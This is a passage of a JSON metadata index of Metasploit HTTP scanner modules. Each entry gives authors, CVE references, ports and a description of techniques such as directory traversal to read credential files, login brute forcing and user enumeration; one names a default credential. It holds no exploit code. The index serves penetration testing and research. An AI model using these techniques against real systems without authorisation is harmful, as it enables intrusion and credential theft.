"full_name": "auxiliary/scanner/http/smt_ipmi_url_redirect_traversal",
"rank": 300,
"disclosure_date": "2013-11-06",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module abuses a directory traversal vulnerability in the url_redirect.cgi application\n accessible through the web interface of Supermicro Onboard IPMI controllers. The vulnerability\n is present due to a lack of sanitization of the url_name parameter. This allows an attacker with\n a valid, but not necessarily administrator-level account, to access the contents of any file\n on the system. This includes the /nv/PSBlock file, which contains the cleartext credentials for\n all configured accounts. This module has been tested on a Supermicro Onboard IPMI (X9SCL/X9SCM)\n with firmware version SMT_X9_214. Other file names to try include /PSStore, /PMConfig.dat, and\n /wsman/simple_auth.passwd",
"references": [
"URL-https://community.rapid7.com/community/metasploit/blog/2013/11/06/supermicro-ipmi-firmware-vulnerabilities",
"URL-https://github.com/zenfish/ipmi/blob/master/dump_SM.py"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/smt_ipmi_url_redirect_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/smt_ipmi_url_redirect_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/soap_xml": {
"name": "HTTP SOAP Verb/Noun Brute Force Scanner",
"full_name": "auxiliary/scanner/http/soap_xml",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to brute force SOAP/XML requests to uncover\n hidden methods.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/soap_xml.rb",
"is_install_path": true,
"ref_name": "scanner/http/soap_xml",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sockso_traversal": {
"name": "Sockso Music Host Server 1.5 Directory Traversal",
"full_name": "auxiliary/scanner/http/sockso_traversal",
"rank": 300,
"disclosure_date": "2012-03-14",
"type": "auxiliary",
"author": [
"Luigi Auriemma",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal bug in Sockso on port\n 4444. This is done by using \"../\" in the path to retrieve a file on\n a vulnerable machine.",
"references": [
"URL-http://aluigi.altervista.org/adv/sockso_1-adv.txt"
],
"platform": "",
"arch": "",
"rport": 4444,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/sockso_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/sockso_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/splunk_web_login": {
"name": "Splunk Web Interface Login Utility",
"full_name": "auxiliary/scanner/http/splunk_web_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Vlatko Kosturjak <kost@linux.hr>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module simply attempts to login to a Splunk web interface. Please note the\n free version of Splunk actually does not require any authentication, in that case\n the module will abort trying. Also, some Splunk applications still have the\n default credential 'admin:changeme' written on the login page. If this default\n credential is found, the module will also store that information, and then move on\n to trying more passwords.",
"references": [
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/splunk_web_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/splunk_web_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/springcloud_traversal": {
"name": "Spring Cloud Config Server Directory Traversal",
"full_name": "auxiliary/scanner/http/springcloud_traversal",
"rank": 300,
"disclosure_date": "2019-04-17",
"type": "auxiliary",
"author": [
"Vern",
"Dhiraj Mishra"
],
"description": "This module exploits an unauthenticated directory traversal vulnerability\n which exists in Spring Cloud Config versions 2.1.x prior to 2.1.2,\n versions 2.0.x prior to 2.0.4, and versions 1.4.x prior to 1.4.6. Spring\n Cloud Config listens by default on port 8888.",
"references": [
"CVE-2019-3799",
"URL-https://pivotal.io/security/cve-2019-3799"
],
"platform": "",
"arch": "",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-04-26 07:15:39 +0000",
"path": "/modules/auxiliary/scanner/http/springcloud_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/springcloud_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/squid_pivot_scanning": {
"name": "Squid Proxy Port Scanner",
"full_name": "auxiliary/scanner/http/squid_pivot_scanning",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"willis"
],
"description": "A misconfigured Squid proxy can allow an attacker to make requests on his behalf.\n This may give the attacker information about devices that he cannot reach but the\n Squid proxy can. For example, an attacker can make requests for internal IP addresses\n against a misconfigured open Squid proxy exposed to the Internet, therefore performing\n an internal port scan. The error messages returned by the proxy are used to determine\n if the port is open or not.\n\n Many Squid proxies use custom error codes so your mileage may vary. The open_proxy\n module can be used to test for open proxies, though a Squid proxy does not have to be\n open in order to allow for pivoting (e.g. an Intranet Squid proxy which allows\n the attack to pivot to another part of the network).",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-08-26 21:01:10 +0000",
"path": "/modules/auxiliary/scanner/http/squid_pivot_scanning.rb",
"is_install_path": true,
"ref_name": "scanner/http/squid_pivot_scanning",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/squiz_matrix_user_enum": {
"name": "Squiz Matrix User Enumeration Scanner",
"full_name": "auxiliary/scanner/http/squiz_matrix_user_enum",
"rank": 300,
"disclosure_date": "2011-11-08",
"type": "auxiliary",
"author": [
"Troy Rose <troy@osisecurity.com.au>",
"aushack <patrick@osisecurity.com.au>"
],
"description": "This module attempts to enumerate remote users that exist within\n the Squiz Matrix and MySource Matrix CMS by sending GET requests for asset IDs\n e.g. ?a=14 and searching for a valid username eg \"~root\" or \"~test\" which\n is prefixed by a \"~\" in the response. It will also try to GET the users\n full name or description, or other information. You may wish to modify\n ASSETBEGIN and ASSETEND values for greater results, or set VERBOSE.\n Information gathered may be used for later bruteforce attacks.",
"references": [
"URL-http://www.osisecurity.com.au/advisories/"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-11-09 03:00:24 +0000",
"path": "/modules/auxiliary/scanner/http/squiz_matrix_user_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/squiz_matrix_user_enum",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ssl": {
"name": "HTTP SSL Certificate Information",
"full_name": "auxiliary/scanner/http/ssl",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>",
"Chris John Riley",
"Veit Hailperin <hailperv@gmail.com>"
],
"description": "Parse the server SSL certificate to obtain the common name and signature algorithm",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/ssl.rb",
"is_install_path": true,
"ref_name": "scanner/http/ssl",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/ssl_version": {
"name": "HTTP SSL/TLS Version Detection (POODLE scanner)",
"full_name": "auxiliary/scanner/http/ssl_version",
"rank": 300,
"disclosure_date": "2014-10-14",
"type": "auxiliary",
"author": [
"todb <todb@metasploit.com>"
],
"description": "Check if an HTTP server supports a given version of SSL/TLS.\n\n If a web server can successfully establish an SSLv3 session, it is\n likely to be vulnerable to the POODLE attack described on\n October 14, 2014, as a patch against the attack is unlikely.",
"references": [
"URL-http://googleonlinesecurity.blogspot.com/2014/10/this-poodle-bites-exploiting-ssl-30.html",
"OSVDB-113251",
"CVE-2014-3566"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/ssl_version.rb",
"is_install_path": true,
"ref_name": "scanner/http/ssl_version",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/support_center_plus_directory_traversal": {
"name": "ManageEngine Support Center Plus Directory Traversal",
"full_name": "auxiliary/scanner/http/support_center_plus_directory_traversal",
"rank": 300,
"disclosure_date": "2014-01-28",
"type": "auxiliary",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a directory traversal vulnerability found in ManageEngine\n Support Center Plus build 7916 and lower. The module will create a support ticket\n as a normal user, attaching a link to a file on the server. By requesting our\n own attachment, it's possible to retrieve any file on the filesystem with the same\n privileges as Support Center Plus is running. On Windows this is always with SYSTEM\n privileges.",
"references": [
"CVE-2014-100002",
"EDB-31262",
"OSVDB-102656",
"BID-65199",
"PACKETSTORM-124975"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-07-08 19:00:11 +0000",
"path": "/modules/auxiliary/scanner/http/support_center_plus_directory_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/support_center_plus_directory_traversal",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"auxiliary_scanner/http/surgenews_user_creds": {
"name": "SurgeNews User Credentials",
"full_name": "auxiliary/scanner/http/surgenews_user_creds",
"rank": 300,
"disclosure_date": "2017-06-16",
"type": "auxiliary",
"author": [
"bcoles <bcoles@gmail.com>"
],
"description": "This module exploits a vulnerability in the WebNews web interface\n of SurgeNews on TCP ports 9080 and 8119 which allows unauthenticated\n users to download arbitrary files from the software root directory;\n including the user database, configuration files and log files.\n\n This module extracts the administrator username and password, and\n the usernames and passwords or password hashes for all users.\n\n This module has been tested successfully on SurgeNews version\n 2.0a-13 on Windows 7 SP 1 and 2.0a-12 on Ubuntu Linux.",
"references": [
"URL-http://news.netwinsite.com:8119/webnews?cmd=body&item=34896&group=netwin.surgemail"
],
"platform": "",
"arch": "",
"rport": 9080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/surgenews_user_creds.rb",
"is_install_path": true,
"ref_name": "scanner/http/surgenews_user_creds",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/svn_scanner": {
"name": "HTTP Subversion Scanner",
"full_name": "auxiliary/scanner/http/svn_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "Detect subversion directories and files and analize its content. Only SVN Version > 7 supported",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/svn_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/svn_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/svn_wcdb_scanner": {
"name": "SVN wc.db Scanner",
"full_name": "auxiliary/scanner/http/svn_wcdb_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Stephen Haywood <stephen@averagesecurityguy.info>"
],
"description": "Scan for servers that allow access to the SVN wc.db file.\n Based on the work by Tim Meddin.",
"references": [
"URL-http://pen-testing.sans.org/blog/pen-testing/2012/12/06/all-your-svn-are-belong-to-us#"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/svn_wcdb_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/svn_wcdb_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/sybase_easerver_traversal": {
"name": "Sybase Easerver 6.3 Directory Traversal",
"full_name": "auxiliary/scanner/http/sybase_easerver_traversal",
"rank": 300,
"disclosure_date": "2011-05-25",
"type": "auxiliary",
"author": [
"Sow Ching Shiong",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a directory traversal vulnerability found in Sybase\n EAserver's Jetty webserver on port 8000. Code execution seems unlikely with\n EAserver's default configuration unless the web server allows WRITE permission.",
"references": [
"CVE-2011-2474",
"OSVDB-72498",
"URL-http://www.sybase.com/detail?id=1093216",
"URL-https://labs.idefense.com/verisign/intelligence/2009/vulnerabilities/display.php?id=912"
],
"platform": "",
"arch": "",
"rport": 8000,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/sybase_easerver_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/sybase_easerver_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/symantec_brightmail_ldapcreds": {
"name": "Symantec Messaging Gateway 10 Exposure of Stored AD Password Vulnerability",
"full_name": "auxiliary/scanner/http/symantec_brightmail_ldapcreds",
"rank": 300,
"disclosure_date": "2015-12-17",
"type": "auxiliary",
"author": [
"Fakhir Karim Reda <karim.fakhir@gmail.com>"
],
"description": "This module will grab the AD account saved in Symantec Messaging Gateway and then\n decipher it using the disclosed Symantec PBE key. Note that authentication is required\n in order to successfully grab the LDAP credentials, and you need at least a read account.\n Version 10.6.0-7 and earlier are affected",
"references": [
"URL-https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160418_00",
"CVE-2016-2203",
"BID-86137"
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/symantec_brightmail_ldapcreds.rb",
"is_install_path": true,
"ref_name": "scanner/http/symantec_brightmail_ldapcreds",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/symantec_brightmail_logfile": {
"name": "Symantec Messaging Gateway 9.5 Log File Download Vulnerability",
"full_name": "auxiliary/scanner/http/symantec_brightmail_logfile",
"rank": 300,
"disclosure_date": "2012-11-30",
"type": "auxiliary",
"author": [
"Ben Williams <ben.williams@ngssecure.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will download a file of your choice against Symantec Messaging\n Gateway. This is possible by exploiting a directory traversal vulnerability\n when handling the 'logFile' parameter, which will load an arbitrary file as\n an attachment. Note that authentication is required in order to successfully\n download your file.",
"references": [
"CVE-2012-4347",
"EDB-23110",
"OSVDB-88165",
"BID-56789",
"URL-http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120827_00"
],
"platform": "",
"arch": "",
"rport": 41080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/scanner/http/symantec_brightmail_logfile.rb",
"is_install_path": true,
"ref_name": "scanner/http/symantec_brightmail_logfile",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/symantec_web_gateway_login": {
"name": "Symantec Web Gateway Login Utility",
"full_name": "auxiliary/scanner/http/symantec_web_gateway_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module will attempt to authenticate to a Symantec Web Gateway.",
"references": [
],
"platform": "",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/symantec_web_gateway_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/symantec_web_gateway_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/titan_ftp_admin_pwd": {
"name": "Titan FTP Administrative Password Disclosure",
"full_name": "auxiliary/scanner/http/titan_ftp_admin_pwd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Spencer McIntyre"
],
"description": "On Titan FTP servers prior to version 9.14.1628, an attacker can\n retrieve the username and password for the administrative XML-RPC\n interface, which listens on TCP Port 31001 by default, by sending an\n XML request containing bogus authentication information. After sending\n this request, the server responds with the legitimate username and\n password for the service. With this information, an attacker has\n complete control over the FTP service, which includes the ability to\n add and remove FTP users, as well as add, remove, and modify\n available directories and their permissions.",
"references": [
"CVE-2013-1625"
],
"platform": "",
"arch": "",
"rport": 31001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/titan_ftp_admin_pwd.rb",
"is_install_path": true,
"ref_name": "scanner/http/titan_ftp_admin_pwd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/title": {
"name": "HTTP HTML Title Tag Content Grabber",
"full_name": "auxiliary/scanner/http/title",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Stuart Morgan <stuart.morgan@mwrinfosecurity.com>"
],
"description": "Generates a GET request to the provided webservers and returns the server header,\n HTML title attribute and location header (if set). This is useful for rapidly identifying\n interesting web applications en mass.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-02-16 14:42:12 +0000",
"path": "/modules/auxiliary/scanner/http/title.rb",
"is_install_path": true,
"ref_name": "scanner/http/title",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/tomcat_enum": {
"name": "Apache Tomcat User Enumeration",
"full_name": "auxiliary/scanner/http/tomcat_enum",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Heyder Andrade <heyder.andrade@gmail.com>",
"Leandro Oliveira <leandrofernando@gmail.com>"
],
"description": "This module enumerates Apache Tomcat's usernames via malformed requests to\n j_security_check, which can be found in the web administration package. It should\n work against Tomcat servers 4.1.0 - 4.1.39, 5.5.0 - 5.5.27, and 6.0.0 - 6.0.18.\n Newer versions no longer have the \"admin\" package by default. The 'admin' package\n is no longer provided for Tomcat 6 and later versions.",
"references": [
"BID-35196",
"CVE-2009-0580",
"OSVDB-55055"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/tomcat_enum.rb",
"is_install_path": true,
"ref_name": "scanner/http/tomcat_enum",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/tomcat_mgr_login": {
"name": "Tomcat Application Manager Login Utility",
"full_name": "auxiliary/scanner/http/tomcat_mgr_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>",
"Matteo Cantoni <goony@nothink.org>",
"jduck <jduck@metasploit.com>"
],
"description": "This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.",
"references": [
"CVE-2009-3843",
"OSVDB-60317",
"BID-37086",
"CVE-2009-4189",
"OSVDB-60670",
"URL-http://www.harmonysecurity.com/blog/2009/11/hp-operations-manager-backdoor-account.html",
"ZDI-09-085",
"CVE-2009-4188",
"BID-38084",
"CVE-2010-0557",
"URL-http://www-01.ibm.com/support/docview.wss?uid=swg21419179",
"CVE-2010-4094",
"ZDI-10-214",
"CVE-2009-3548",
"OSVDB-60176",
"BID-36954",
"URL-http://tomcat.apache.org/",
"CVE-1999-0502"
],
"platform": "",
"arch": "",
"rport": 8080,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443,
8081,
8444,
9080,
19300
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2018-02-13 14:31:56 +0000",
"path": "/modules/auxiliary/scanner/http/tomcat_mgr_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/tomcat_mgr_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/totaljs_traversal": {
"name": "Total.js prior to 3.2.4 Directory Traversal",
"full_name": "auxiliary/scanner/http/totaljs_traversal",
"rank": 300,
"disclosure_date": "2019-02-18",
"type": "auxiliary",
"author": [
"Riccardo Krauter",
"Fabio Cogno"
],
"description": "This module check and exploits a directory traversal vulnerability in Total.js prior to 3.2.4.\n\n Here is a list of accepted extensions: flac, jpg, jpeg, png, gif, ico, js, css, txt, xml,\n woff, woff2, otf, ttf, eot, svg, zip, rar, pdf, docx, xlsx, doc, xls, html, htm, appcache,\n manifest, map, ogv, ogg, mp4, mp3, webp, webm, swf, package, json, md, m4v, jsx, heif, heic",
"references": [
"CVE-2019-8903",
"CWE-22",
"URL-https://blog.totaljs.com/blogs/news/20190213-a-critical-security-fix/",
"URL-https://snyk.io/vuln/SNYK-JS-TOTALJS-173710"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2019-03-11 22:23:11 +0000",
"path": "/modules/auxiliary/scanner/http/totaljs_traversal.rb",
"is_install_path": true,
"ref_name": "scanner/http/totaljs_traversal",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/tplink_traversal_noauth": {
"name": "TP-Link Wireless Lite N Access Point Directory Traversal Vulnerability",
"full_name": "auxiliary/scanner/http/tplink_traversal_noauth",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Michael Messner <devnull@s3cur1ty.de>"
],
"description": "This module tests whether a directory traversal vulnerability is present in\n versions of TP-Link Access Point 3.12.16 Build 120228 Rel.37317n.",
"references": [
"CVE-2012-5687",
"OSVDB-86881",
"BID-57969",
"EDB-24504",
"URL-http://www.s3cur1ty.de/m1adv2013-011"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/tplink_traversal_noauth.rb",
"is_install_path": true,
"ref_name": "scanner/http/tplink_traversal_noauth",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/trace": {
"name": "HTTP Cross-Site Tracing Detection",
"full_name": "auxiliary/scanner/http/trace",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jay Turla <@shipcod3>",
"CG <cg@carnal0wnage.com>"
],
"description": "Checks if the host is vulnerable to Cross-Site Tracing (XST)",
"references": [
"CVE-2005-3398",
"URL-https://www.owasp.org/index.php/Cross_Site_Tracing"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/trace.rb",
"is_install_path": true,
"ref_name": "scanner/http/trace",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/trace_axd": {
"name": "HTTP trace.axd Content Scanner",
"full_name": "auxiliary/scanner/http/trace_axd",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"c4an"
],
"description": "Detect trace.axd files and analize its content",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/trace_axd.rb",
"is_install_path": true,
"ref_name": "scanner/http/trace_axd",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/typo3_bruteforce": {
"name": "Typo3 Login Bruteforcer",
"full_name": "auxiliary/scanner/http/typo3_bruteforce",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Christian Mehlmauer <FireFart@gmail.com>"
],
"description": "This module attempts to bruteforce Typo3 logins.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/typo3_bruteforce.rb",
"is_install_path": true,
"ref_name": "scanner/http/typo3_bruteforce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/vcms_login": {
"name": "V-CMS Login Utility",
"full_name": "auxiliary/scanner/http/vcms_login",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module attempts to authenticate to an English-based V-CMS login interface. It\n should only work against version v1.1 or older, because these versions do not have\n any default protections against brute forcing.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/vcms_login.rb",
"is_install_path": true,
"ref_name": "scanner/http/vcms_login",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/verb_auth_bypass": {
"name": "HTTP Verb Authentication Bypass Scanner",
"full_name": "auxiliary/scanner/http/verb_auth_bypass",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module test for authentication bypass using different HTTP verbs.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/verb_auth_bypass.rb",
"is_install_path": true,
"ref_name": "scanner/http/verb_auth_bypass",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/vhost_scanner": {
"name": "HTTP Virtual Host Brute Force Scanner",
"full_name": "auxiliary/scanner/http/vhost_scanner",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"et <et@metasploit.com>"
],
"description": "This module tries to identify unique virtual hosts\n hosted by the target web server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/scanner/http/vhost_scanner.rb",
"is_install_path": true,
"ref_name": "scanner/http/vhost_scanner",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_scanner/http/wangkongbao_traversal": {
"name": "WANGKONGBAO CNS-1000 and 1100 UTM Directory Traversal",
"full_name": "auxiliary/scanner/http/wangkongbao_traversal",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Dillon Beresford"
],
